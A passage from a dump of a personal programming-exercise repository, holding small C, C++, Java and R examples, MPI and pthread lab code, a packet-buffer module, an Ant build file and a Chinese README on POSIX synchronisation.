[**gmtime**](http://www.cplusplus.com/reference/ctime/gmtime/)\n\n Convert time_t to tm as UTC time (function )\n\n\n- [**localtime**](http://www.cplusplus.com/reference/ctime/localtime/)\n\n Convert time_t to tm as local time (function )\n\n\n- [**strftime**](http://www.cplusplus.com/reference/ctime/strftime/)\n\n Format time as string (function )\n\n## Reference\n\n[cplusplus.com](http://www.cplusplus.com/reference/clibrary/)\n\n" }, { "alpha_fraction": 0.5110132098197937, "alphanum_fraction": 0.5462555289268494, "avg_line_length": 19.636363983154297, "blob_id": "3624e0061f92c727232951124cfb93a364e6b909", "content_id": "90603d3f10739d15e955bf22fe868986a4712c13", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 227, "license_type": "permissive", "max_line_length": 35, "num_lines": 11, "path": "/c/hardwork/hardway/strchr.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <string.h> // for strchr()\n#include <math.h> // for pow()\nchar a[10] = \"abcdefghi\";\n\nint main() {\n char* p = strchr(a, 'c');\n printf(\"%s\", p);\n\n printf(\"%lf\", pow(128, 8) / 60);\n}\n" }, { "alpha_fraction": 0.46666666865348816, "alphanum_fraction": 0.4933333396911621, "avg_line_length": 9.857142448425293, "blob_id": "26897e5cede296fc2f047d431ba84e361499116b", "content_id": "d6d7803febdd59e99a75aa0ef613068d71aec85e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 75, "license_type": "permissive", "max_line_length": 24, "num_lines": 7, "path": "/R/harwork/hardway/function.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Function\n\nprint_x <- function(x) {\n cat(\"x =\", x, \"\\n\")\n}\n\nprint_x(\"12\")" }, { "alpha_fraction": 0.4231884181499481, "alphanum_fraction": 0.46666666865348816, "avg_line_length": 15.428571701049805, "blob_id": "0039bb143508fbf080fe6b990b9866b9185d7132", "content_id": "15f380fd2cfcd146a8dc5a9b351ad7aea367fcf8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 345, "license_type": "permissive", "max_line_length": 42, "num_lines": 21, "path": "/c/hardwork/hardway/rabbits_recall_func_itself.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf() printf()\n\nlong long f(long long n) {\n if (n == 0)\n return 1;\n else if (n == 1)\n return 1;\n else if (n == 2)\n return 2;\n else\n return (f(n - 1) + f(n - 2));\n}\n\nint main() {\n long long n;\n scanf(\"%lld\", &n);\n if (n > 20) n = n % 21;\n if (0 == n) n = 1;\n printf(\"%lld\\n\", f(n));\n return 0;\n}\n" }, { "alpha_fraction": 0.5263158082962036, "alphanum_fraction": 0.5263158082962036, "avg_line_length": 9.307692527770996, "blob_id": "d5599960b652ddaffd98517167bda9597fda81a2", "content_id": "ec143f1f5542b26af4a4ae1afd22558a29785d9e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 133, "license_type": "permissive", "max_line_length": 41, "num_lines": 13, "path": "/cplusplus/hardwork/C++17/helloworld.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <iostream>\n\n\n// todo \n// learn more about C++\n\nauto f() {\n std::cout << \"hellworld!\" << std::endl;\n}\n\nint main() {\n f();\n}" }, { "alpha_fraction": 0.6056414842605591, "alphanum_fraction": 0.6100090742111206, "avg_line_length": 28.074073791503906, "blob_id": "c707750d7808bedf0d158148b74f2b114fa13811", "content_id": "9ffcb0773a16272d50dcdf039c134e08d03b8c10", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 5495, "license_type": "permissive", "max_line_length": 80, "num_lines": 189, "path": "/c/projects/sniff/buffer.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <buffer.h>\n/* this file has nothing to do with pcap and sniffing so you can skip reading\n * this so not a lot of comments here, most things are straight forward. this\n * basically implements a very simple memory buffer to store all the packets we\n * collect.\n */\n\n/* do some sanity checks and initialize the buffer */\nint create_buffer(buffer* buf, long long int capacity, long long garbage) {\n if (buf == NULL) return -1;\n\n buf->items = 0;\n buf->garbage_size = (garbage <= 0) ? GARBAGE_SIZE : garbage;\n buf->capacity = (capacity <= 0) ? DEFAULT_CAPACITY : capacity;\n buf->header = NULL;\n buf->tail = NULL;\n\n return 0;\n}\n\n/* append the packet to the buffer avoid sanity checks, we want to be done\n * quickly here */\nint append_item(buffer* buf, const struct pcap_pkthdr* packet_header,\n const u_char* full_packet) {\n item* tmp;\n\n#ifdef DEBUG\n /* if already full run garbage collector and see */\n if (buf->items >= buf->capacity) {\n gc(buf);\n if (buf->items >= buf->capacity) return -1;\n }\n#endif\n\n /* first item */\n if (buf->items == 0) {\n /* allocate space for new item */\n if ((tmp = (item*)malloc(sizeof(item))) == NULL) {\n fprintf(stderr, \"could not allocate memory for an item\\n\");\n exit(-1);\n }\n\n /* allocate space for packet header and set it */\n if ((tmp->packet_header =\n (struct pcap_pkthdr*)malloc(sizeof(struct pcap_pkthdr))) == NULL) {\n fprintf(stderr, \"could not allocate memory for packet header\\n\");\n exit(-1);\n }\n memcpy(tmp->packet_header, packet_header, sizeof(struct pcap_pkthdr));\n\n /* allocate space for full packet and set it */\n if ((tmp->full_packet = (u_char*)malloc((packet_header->caplen))) == NULL) {\n fprintf(stderr, \"could not allocate memory for full packet\\n\");\n exit(-1);\n }\n memcpy(tmp->full_packet, full_packet, packet_header->caplen);\n\n tmp->garbage = 0;\n tmp->next = NULL;\n tmp->prev = NULL;\n\n /* set header etc. properly */\n buf->header = tmp;\n buf->tail = tmp;\n buf->items++;\n } else {\n /* has one or more items */\n if ((tmp = (item*)malloc(sizeof(item))) == NULL) {\n fprintf(stderr, \"could not allocate memory for an item\\n\");\n exit(-1);\n }\n\n /* allocate space for packet header */\n if ((tmp->packet_header =\n (struct pcap_pkthdr*)malloc(sizeof(struct pcap_pkthdr))) == NULL) {\n fprintf(stderr, \"could not allocate memory for packet header\\n\");\n exit(-1);\n }\n memcpy(tmp->packet_header, packet_header, sizeof(struct pcap_pkthdr));\n\n /* allocate space for full packet */\n if ((tmp->full_packet = (u_char*)malloc(packet_header->caplen)) == NULL) {\n fprintf(stderr, \"could not allocate memory for full packet\\n\");\n exit(-1);\n }\n memcpy(tmp->full_packet, full_packet, packet_header->caplen);\n\n tmp->garbage = 0;\n\n /* set header etc. properly */\n /* for the new node, next is current header\n * prev is NULL\n */\n tmp->next = buf->header;\n tmp->prev = NULL;\n\n /* for the current header,\n * prev is new node\n */\n (buf->header)->prev = tmp;\n\n /* header is new node */\n buf->header = tmp;\n buf->items++;\n }\n\n /* signal the garbage collector here */\n gc(buf);\n\n#ifdef DEBUG\n fprintf(stderr, \".\");\n#endif\n\n return 0;\n}\n\n/* a stupid mark and sweep approach */\nint gc(buffer* buf) {\n item* tail;\n item* tmp;\n long long int i;\n long long int half_i;\n long long int removed = 0;\n\n /* start collection only if more than GARBAGE_SIZE items present in the buffer\n */\n if (buf->items <= buf->garbage_size) return 0;\n\n /* sweep half the buffer (minus the first two elements)\n * from tail and delete them if they are ready for collection\n */\n tail = buf->tail;\n half_i = buf->items / 2;\n i = 0;\n\n /* do a simple sweep from behind and remove items marked for collection */\n\n /* case 1: remove all tail items that are marked for deletion\n * most likely all the items in the back of the buffer are marked\n * for collection, so from tail we expect a long continous list\n * available for collection. let us cycle thru them first\n */\n while ((i < half_i) && (tail->garbage)) {\n tail = tail->prev; /* move one ahead */\n free(tail->next); /* free the follower */\n tail->next = NULL; /* follower is NULL */\n\n /* update the items at the end, so that apend\n * doesn't need to wait very often for the lock]\n */\n /* buf->items--;*/ /* one less item */\n ++removed;\n ++i;\n }\n buf->items -= removed;\n\n /* case 2: we would get out of the above loop when either all garbage\n * is collected (i >= half_i) or there was an item found that's not\n * ready for collection. in this case we may end up removing stuff from\n * the middle of the buffer. so lets do that next.\n */\n\n /* Houston we have a problem! we are running out of battery power!*/\n\n removed = 0;\n /* get in here only if we need to remove something in the middle */\n while ((i < half_i) && (tail != NULL)) {\n /* in the middle */\n if (tail->garbage) {\n (tail->prev)->next = tail->next;\n (tail->next)->prev = tail->prev; /* expect a bark for last item */\n tmp = tail;\n tail = tail->prev;\n free(tmp);\n\n /* update the items at the end so that append doesn't have to\n * wait for lock very often\n */\n /* buf->items--;*/ /* one less item */\n ++i;\n } else {\n tail = tail->prev;\n ++i;\n }\n }\n buf->items -= removed;\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5942720770835876, "alphanum_fraction": 0.6133651733398438, "avg_line_length": 18.090909957885742, "blob_id": "2e8fe15aa3207c3e5cb1c001ce10ad58caa0d2fe", "content_id": "2fd0ed142eb3b168549503e64b6811977b2a903c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 419, "license_type": "permissive", "max_line_length": 51, "num_lines": 22, "path": "/java/projects/algorithms/chapter1/part1/Q20.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q20\n */\nimport java.util.Scanner;\nimport java.lang.Math;\n\npublic class Q20 {\n public static void main(String[] args) {\n Scanner scanner = new Scanner(System.in);\n\n while (scanner.hasNext())\n System.out.println(myLog(scanner.nextInt()));\n\n scanner.close();\n }\n\n public static double myLog(int n) {\n assert (n > 0);\n if (n == 1) return 0;\n return myLog(n - 1) + Math.log((double)n);\n }\n}" }, { "alpha_fraction": 0.6251968741416931, "alphanum_fraction": 0.6267716288566589, "avg_line_length": 20.931034088134766, "blob_id": "573cfd5070cccb1668b80bca876e3bd52d8669e5", "content_id": "c973653898611bd6325dbdfa7aaa426825c67b6d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 635, "license_type": "permissive", "max_line_length": 67, "num_lines": 29, "path": "/c/projects/MPI/hardway/MPI_rank.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <mpi.h>\n#include <time.h>\n#include <stdio.h>\n\nvoid print_now_time() {\n time_t rawtime;\n struct tm * timeinfo;\n\n time ( &rawtime );\n timeinfo = localtime ( &rawtime );\n printf ( \"Current local time and date: %s\", asctime (timeinfo) );\n\n printf(\"Current Timer: %f\\n\\n\", ((float)clock())/CLOCKS_PER_SEC);\n}\n\n\nint main(int argc, char **argv) {\n\n int process_id, process_num;\n \n MPI_Init(&argc, &argv);\n MPI_Comm_size(MPI_COMM_WORLD, &process_num);\n MPI_Comm_rank(MPI_COMM_WORLD, &process_id);\n printf(\"total has %d, now is %d\\n\", process_num, process_id);\n print_now_time();\n MPI_Finalize();\n \n return 0;\n}" }, { "alpha_fraction": 0.6416184902191162, "alphanum_fraction": 0.6445086598396301, "avg_line_length": 18.27777862548828, "blob_id": "cf14c419be21dda3abb0ffc2c6dbb4d1fad0d164", "content_id": "aefd33ee6c9adc81c85155c1b8a23ef61d076671", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 418, "license_type": "permissive", "max_line_length": 49, "num_lines": 18, "path": "/c/projects/MPI/hardway/MPI_size.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <mpi.h>\n#include <stdio.h>\n\n\nint main(int argc, char**argv) {\n int process_num;\n MPI_Init(&argc, &argv);\n \n // int MPI_Comm_size(MPI_Comm comm, int *rank)\n // 获取指定通信域的进程个数。\n // 第一个参数是通信子,第二个参数返回进程的个数。\n MPI_Comm_size(MPI_COMM_WORLD, &process_num);\n\n printf(\"the process num is %d\\n\", process_num);\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.7935517430305481, "alphanum_fraction": 0.8086323738098145, "avg_line_length": 38.26530456542969, "blob_id": "033ce27c9220a53893950c1b2a1ca790a7878cd2", "content_id": "c392a87fded9cfba8496034b6572fbc1d0e24401", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4123, "license_type": "permissive", "max_line_length": 250, "num_lines": 49, "path": "/c/projects/POSIX/Lab3/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Linux POSIX线程互斥和同步\n\n## HelloWorld\n这就必须要使用上次的进程相关的知识了,上锁机制的目的也就是为了进程间的同步,说简单点就是只能有一个进程访问关键区。\n\n样例很通俗,不管是创建使用进程部分还是使用mutex部分,基本思路就是上锁解锁,要记得在一开始要初始化最后要摧毁。\n\n因为简单,自然没有包括mutex的三种类型和两种初始化方法。\n\n## semaphore\n信号量还是很有意思的,使用的方法和mutex套路是一样的,不同在于这里可以指定一个初始值,不过例程改为纯C语言描述后在mac OS 下是会报启用警告的,具体可以参考这个[问题](https://stackoverflow.com/questions/27736618/why-are-sem-init-sem-getvalue-sem-destroy-deprecated-on-mac-os-x-and-w),最开始还想蒙混过关,最后还是不行,所以最后的编写环境是`Ubuntu 16.04LTS`\n不过还是有点疑惑,双值和计数型信号量是怎么区分的,后看看到了参考如下\n```\n#include <semaphore.h>\n\nint sem_init( sem_t * sem, \n int pshared, \n unsigned value );\nvalue\nThe initial value of the semaphore. A positive value (i.e., greater than zero) indicates an unlocked semaphore, and a value of 0 (zero) indicates a locked semaphore. This value must not exceed SEM_VALUE_MAX.\n```\n嗯这就好办了。\n\n## 生产者消费者问题\n> 设计一个程序来解决有限缓冲问题,其中的生产者与消费者进程如图6.10 与图6.11 所示。\n> 在6.6.1 小节中,使用了三个信号量: empty (以记录有多少空位)、full (以记录有多少满位)以及mutex (二进制信号量或互斥信号量,以保护对缓冲插入与删除的操作)。对于本项目, empty 与full 将采用标准计数信号量,而mutex 将采用二进制信号量。生产者与消费者作为独立线程,在empty、full、mutex 的同步前提下,对缓冲进行插入与删除。\n> 本项目,可采用Pthread 。\n\n嗯,思路大概是先写出文件读写框架,然后加入创建线程部分,最后加入信号量部分,具体的代码和输出请参考3.1部分,因为书上本来就有算法所以写起来也没费太大功夫。\n\n## 读者写者问题\n> 实验要求\n> 在Linux环境下,创建一个进程,此进程包含n个线程。用这n个线程来表示n个读者或写者。每个线程按相应测试数据文件(后面有介绍)的要求进行读写操作。用信号量机制分别实现读者优先和写者优先的读者-写者问题。\n> 读者-写者问题的读写操作限制(仅读者优先或写者优先):\n> 1)写-写互斥,即不能有两个写者同时进行写操作。\n> 2)读-写互斥,即不能同时有一个线程在读,而另一个线程在写。\n> 3)读-读允许,即可以有一个或多个读者在读。\n> 读者优先的附加限制:如果一个读者申请进行读操作时已有另一个读者正在进行读操作,则该读者可直接开始读操作。\n> 写者优先的附加限制:如果一个读者申请进行读操作时已有另一写者在等待访问共享资源,则该读者必须等到没有写者处于等待状态后才能开始读操作。\n> 运行结果显示要求:要求在每个线程创建、发出读写操作申请、开始读写操作和结束读写操作时分别显示一行提示信息,以确定所有处理都遵守相应的读写操作限制。\n\n有了上面一次的经验,这次写的就很轻松,读者优先书上是给出算法了的,所以对着翻译就好了,写者优先参考了网上的算法,用的锁有点多,具体请参考3.2对应文件部分。\n\n## 心得体会\n\n进程通信比想象中有意思,不过目前的所有程序都是数据以全局变量共享,如果以后有机会想试一下真正意义上的共享存储空间,另外就是踩了很多坑,主要是关于环境的问题,之前一直是在mac OS下进行C编程,现在重新装了Linux虚拟机倒也还行。\n\n## REFERENCE\n[POSIX Threads Programming](https://computing.llnl.gov/tutorials/pthreads/)" }, { "alpha_fraction": 0.5680429339408875, "alphanum_fraction": 0.5695241689682007, "avg_line_length": 39.92424392700195, "blob_id": "2b70e4e21b43a284d6ae5c91910d17fc5c09fc43", "content_id": "5018597ac47a44a1929fa5a4dfde09b208ee40d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Ant Build System", "length_bytes": 5401, "license_type": "permissive", "max_line_length": 154, "num_lines": 132, "path": "/java/projects/gridworld/docs/Use_Junit_in_Ant/build.xml", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project name=\"Hello\" basedir=\".\" default=\"package\">\n\n <property name=\"version\" value=\"1.6\"/>\n <property name=\"haltonfailure\" value=\"no\"/>\n\n <property name=\"out\" value=\"out\"/>\n\n <property name=\"production.src\" value=\"src\"/>\n <property name=\"production.lib\" value=\"lib\"/>\n <property name=\"production.resources\" value=\"config\"/>\n <property name=\"production.classes\" value=\"${out}/production/${ant.project.name}\"/>\n\n <property name=\"test.src\" value=\"test\"/>\n <property name=\"test.lib\" value=\"lib\"/>\n <property name=\"test.resources\" value=\"config\"/>\n <property name=\"test.classes\" value=\"${out}/test/${ant.project.name}\"/>\n\n <property name=\"exploded\" value=\"out/exploded/${ant.project.name}\"/>\n <property name=\"exploded.classes\" value=\"${exploded}/WEB-INF/classes\"/>\n <property name=\"exploded.lib\" value=\"${exploded}/WEB-INF/lib\"/>\n\n <property name=\"reports.out\" value=\"${out}/reports\"/>\n <property name=\"junit.out\" value=\"${reports.out}/junit\"/>\n <property name=\"testng.out\" value=\"${reports.out}/testng\"/>\n\n <path id=\"production.class.path\">\n <pathelement location=\"${production.classes}\"/>\n <pathelement location=\"${production.resources}\"/>\n <fileset dir=\"${production.lib}\">\n <include name=\"**/*.jar\"/>\n <exclude name=\"**/junit*.jar\"/>\n <exclude name=\"**/*test*.jar\"/>\n </fileset>\n </path>\n\n <path id=\"test.class.path\"> \n <path refid=\"production.class.path\"/>\n <pathelement location=\"${test.classes}\"/>\n <pathelement location=\"${test.resources}\"/>\n <fileset dir=\"${test.lib}\">\n <include name=\"**/junit*.jar\"/>\n <include name=\"**/*test*.jar\"/>\n </fileset>\n </path>\n\n <path id=\"testng.class.path\">\n <fileset dir=\"${test.lib}\">\n <include name=\"**/testng*.jar\"/>\n </fileset>\n </path>\n\n <available file=\"${out}\" property=\"outputExists\"/>\n\n <target name=\"clean\" description=\"remove all generated artifacts\" if=\"outputExists\">\n <delete dir=\"${out}\" includeEmptyDirs=\"true\"/>\n <delete dir=\"${reports.out}\" includeEmptyDirs=\"true\"/>\n </target>\n\n <target name=\"create\" description=\"create the output directories\" unless=\"outputExists\">\n <mkdir dir=\"${production.classes}\"/>\n <mkdir dir=\"${test.classes}\"/>\n <mkdir dir=\"${reports.out}\"/>\n <mkdir dir=\"${junit.out}\"/>\n <mkdir dir=\"${testng.out}\"/>\n <mkdir dir=\"${exploded.classes}\"/>\n <mkdir dir=\"${exploded.lib}\"/>\n </target>\n\n <target name=\"compile\" description=\"compile all .java source files\" depends=\"create\">\n <!-- Debug output\n <property name=\"production.class.path\" refid=\"production.class.path\"/>\n <echo message=\"${production.class.path}\"/>\n -->\n <javac srcdir=\"src\" destdir=\"${out}/production/${ant.project.name}\" debug=\"on\" source=\"${version}\">\n <classpath refid=\"production.class.path\"/>\n <include name=\"**/*.java\"/>\n <exclude name=\"**/*Test.java\"/>\n </javac>\n <javac srcdir=\"${test.src}\" destdir=\"${out}/test/${ant.project.name}\" debug=\"on\" source=\"${version}\">\n <classpath refid=\"test.class.path\"/>\n <include name=\"**/*Test.java\"/>\n </javac>\n </target>\n\n <target name=\"junit-test\" description=\"run all junit tests\" depends=\"compile\">\n <!-- Debug output\n <property name=\"test.class.path\" refid=\"test.class.path\"/>\n <echo message=\"${test.class.path}\"/>\n -->\n <junit printsummary=\"yes\" haltonfailure=\"${haltonfailure}\">\n <classpath refid=\"test.class.path\"/>\n <formatter type=\"xml\"/>\n <batchtest fork=\"yes\" todir=\"${junit.out}\">\n <fileset dir=\"${test.src}\">\n <include name=\"**/*Test.java\"/>\n </fileset>\n </batchtest>\n </junit>\n <junitreport todir=\"${junit.out}\">\n <fileset dir=\"${junit.out}\">\n <include name=\"TEST-*.xml\"/>\n </fileset>\n <report todir=\"${junit.out}\" format=\"frames\"/>\n </junitreport>\n </target>\n\n <taskdef resource=\"testngtasks\" classpathref=\"testng.class.path\"/>\n <target name=\"testng-test\" description=\"run all testng tests\" depends=\"compile\">\n <!-- Debug output\n <property name=\"test.class.path\" refid=\"test.class.path\"/>\n <echo message=\"${test.class.path}\"/>\n -->\n <testng classpathref=\"test.class.path\" outputDir=\"${testng.out}\" haltOnFailure=\"${haltonfailure}\" verbose=\"2\" parallel=\"methods\" threadcount=\"50\">\n <classfileset dir=\"${out}/test/${ant.project.name}\" includes=\"**/*.class\"/>\n </testng>\n </target>\n\n <target name=\"exploded\" description=\"create exploded deployment\" depends=\"testng-test\">\n <copy todir=\"${exploded.classes}\">\n <fileset dir=\"${production.classes}\"/>\n </copy>\n <copy todir=\"${exploded.lib}\">\n <fileset dir=\"${production.lib}\"/>\n </copy>\n </target>\n\n <target name=\"package\" description=\"create package file\" depends=\"exploded\">\n <jar destfile=\"${out}/${ant.project.name}.jar\" basedir=\"${production.classes}\" includes=\"**/*.class\"/>\n </target>\n\n</project>" }, { "alpha_fraction": 0.42990654706954956, "alphanum_fraction": 0.4392523467540741, "avg_line_length": 9.699999809265137, "blob_id": "f5cee7207aac79cf11948f4e2ad30701ec0a79c6", "content_id": "4be9de7bfaabda62dafa6f8ebf0752df214065e7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 107, "license_type": "permissive", "max_line_length": 19, "num_lines": 10, "path": "/c/hardwork/hardway/static_in_func.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nvoid m() {\n static int x = 5;\n x++;\n printf(\"%d\", x);\n}\nint main() {\n m();\n m();\n}\n" }, { "alpha_fraction": 0.4480796456336975, "alphanum_fraction": 0.4722617268562317, "avg_line_length": 19.08571434020996, "blob_id": "5f8a27b2464fbdd171d76400e9d4057ed3e69f9c", "content_id": "f00af7ad24074ab329a0e6875bebb5ada21fcce3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 703, "license_type": "permissive", "max_line_length": 77, "num_lines": 35, "path": "/c/hardwork/hardway/sort_string(bubble).cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <string.h>\n\nchar *sortString(const char *const s) {\n int i, j, a;\n int len = strlen(s);\n char *str = new char[len];\n strcpy(str, s);\n for (i = 0; i < len; i++)\n for (j = 0; j < len; j++)\n if (str[i] < str[j]) {\n a = str[i];\n str[i] = str[j];\n str[j] = a;\n }\n return str;\n}\n\nvoid sortString(const char *const s, char *s1) { strcpy(s1, sortString(s)); }\n\nint main() {\n char a[] = \"123456\";\n char *p = sortString(a);\n for (int i = 0; p[i] != '\\0'; i++) {\n printf(\"%c\", p[i]);\n }\n putchar('\\n');\n char *p2 = a;\n sortString(a, p2);\n for (int i = 0; p[i] != '\\0'; i++) {\n printf(\"%c\", p[i]);\n }\n putchar('\\n');\n return 0;\n}\n" }, { "alpha_fraction": 0.5711462497711182, "alphanum_fraction": 0.5869565010070801, "avg_line_length": 18.09433937072754, "blob_id": "faaf505c70f158bf3943c0465a1411eaa304b311", "content_id": "6c7cfd31a0775a04a12c5d0d6a9fd3f374abf4f2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1012, "license_type": "permissive", "max_line_length": 65, "num_lines": 53, "path": "/c/projects/POSIX/Lab3/3.0.helloworld.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/*\n * jskyzero 2017(R) in SYSU\n * create 10 thread and calcute\n */\n\n#include <errno.h>\n#include <pthread.h>\n#include <stdio.h>\n#include <stdlib.h>\n\n#define THREAD_NUMBER 10\n\n// initial mutex\nstatic pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;\n// glabal data store\nint sum = 0;\n\n// thread function\nvoid *inc(void *arg) {\n int i = (*(int *)arg);\n // lock\n pthread_mutex_lock(&mutex);\n sum = sum + i;\n // unlock\n pthread_mutex_unlock(&mutex);\n return NULL;\n}\n\nint main(int argc, char *argv[]) {\n pthread_t pt[THREAD_NUMBER];\n int args[THREAD_NUMBER];\n for (int i = 0; i < THREAD_NUMBER; i++) {\n args[i] = i;\n if (pthread_create(&pt[i], NULL, inc, (void *)&args[i]) != 0)\n {\n printf(\"pthread_create error\\n\");\n exit(1);\n }\n }\n \n for (int i = 0; i < THREAD_NUMBER; i++)\n {\n if (pthread_join(pt[i], NULL) != 0) {\n printf(\"pthread_join error\\n\");\n exit(1);\n }\n }\n\n printf(\"sum is %d\\n\", sum);\n // distory mutex\n pthread_mutex_destroy(&mutex);\n return 0;\n}\n" }, { "alpha_fraction": 0.6319290399551392, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 17.79166603088379, "blob_id": "1bfba9e28c801ea60f44773d02a2d8cb80807efd", "content_id": "0b39d42f223916a3de57b8dc0d98a982718d289a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 451, "license_type": "permissive", "max_line_length": 58, "num_lines": 24, "path": "/c/hardwork/hardway/_struct_node.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nstruct Node {\n\tint data;\n\tstruct Node * next;\n};\n\ntypedef struct Node Node;\n\n/*\ntypedef struct Node {\n int date;\n struct Node *next;\n } LNode, *LinkList; \n*/\nint main() {\n Node head = {0, NULL};\n printf(\"sizeof Node %ld\\n\", sizeof(Node));\n printf(\"sizeof Instance %ld\\n\", sizeof(head));\n printf(\"sizeof Instance data %ld\\n\", sizeof(head.data));\n printf(\"sizeof Instance next %ld\\n\", sizeof(head.next));\n\n return 0;\n}\n" }, { "alpha_fraction": 0.6231772899627686, "alphanum_fraction": 0.6308518648147583, "avg_line_length": 24.076923370361328, "blob_id": "c1f48fe4f35088620a7853e82d9c0fd64a4c46b0", "content_id": "d17b121b48ca72ba3e50e65d81e872940981bf49", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1487, "license_type": "permissive", "max_line_length": 77, "num_lines": 52, "path": "/c/projects/MPI/hardway/MPI_group_compare.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 对两个进程组做最基本的判断,例如成员是否相同,次序是否一致等等。\n\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n MPI_Group group_world, new_group_world;\n int members[5];\n int result;\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n MPI_Comm_group(MPI_COMM_WORLD, &group_world);\n\n members[0] = 0;\n\n MPI_Group_incl(group_world, 1, members, &new_group_world);\n\n if (myid == 0) {\n // int MPI_Group_compare(MPI_Group group1, MPI_Group group2, int *result)\n MPI_Group_compare(group_world, group_world, &result);\n\n if (result == MPI_IDENT) {\n printf(\"Now the groups are identical.\\n\");\n } else if (result == MPI_SIMILAR) {\n printf(\"Now the groups are similar.\\n\");\n } else {\n printf(\"Now the groups are unequal.\\n\");\n }\n\n // 如果在两个组中成员和次序完全相等,返回MPI_IDENT。\n // 例如在group1和group2是同一句柄时就会发生这种情况。\n // 如果组成员相同而次序不同则返回MPI_SIMILAR,否则返回MPI_UNEQUAL。\n MPI_Group_compare(new_group_world, group_world, &result);\n \n\n if (result == MPI_IDENT) {\n printf(\"Now the groups are identical.\\n\");\n } else if (result == MPI_SIMILAR) {\n printf(\"Now the groups are similar.\\n\");\n } else {\n printf(\"Now the groups are unequal.\\n\");\n }\n }\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.47422680258750916, "alphanum_fraction": 0.4845360815525055, "avg_line_length": 13.076923370361328, "blob_id": "2c57e73f17d24f1603fbfd80f684fa6a34c118df", "content_id": "d1d753f61fbfdbdabf95f91bc057676f4a42c564", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 194, "license_type": "permissive", "max_line_length": 35, "num_lines": 13, "path": "/c/hardwork/library/stdio/freopen.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\r\n\r\nint main() {\r\n freopen(\"printf.c\", \"r\", stdin);\r\n freopen(\"1\", \"w\", stdout);\r\n\r\n char ch;\r\n while ((ch = getchar()) != EOF) {\r\n putchar(ch);\r\n }\r\n \r\n return 0;\r\n}" }, { "alpha_fraction": 0.3802816867828369, "alphanum_fraction": 0.38732394576072693, "avg_line_length": 16.625, "blob_id": "dcfcebcdeca495e9be06797e39bed783ce420547", "content_id": "95a25ed61e972587e7adb9cc817d96ed5f4343ef", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 142, "license_type": "permissive", "max_line_length": 37, "num_lines": 8, "path": "/c/hardwork/hardway/extern.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\t int i;\n\t int main()\n\t {\n extern int i;\n\t if (i == 0)\n\t printf(\"scope rules\\n\");\n\t }\n\n" }, { "alpha_fraction": 0.5829145908355713, "alphanum_fraction": 0.5879396796226501, "avg_line_length": 18.899999618530273, "blob_id": "3ab20331ded5223470dfd0bd5a3104ab4f0842d5", "content_id": "39414d0b8955295dd735a62bda60b914f3093d08", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 199, "license_type": "permissive", "max_line_length": 34, "num_lines": 10, "path": "/c/hardwork/hardway/strcpy.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <string.h>\n#include <stdio.h>\nint main() {\n char str[] = \"hello, world!!\\n\";\n char strc[] = \"good morning\\n\";\n strcpy(strc, str);\n printf(\"%s\\n\", 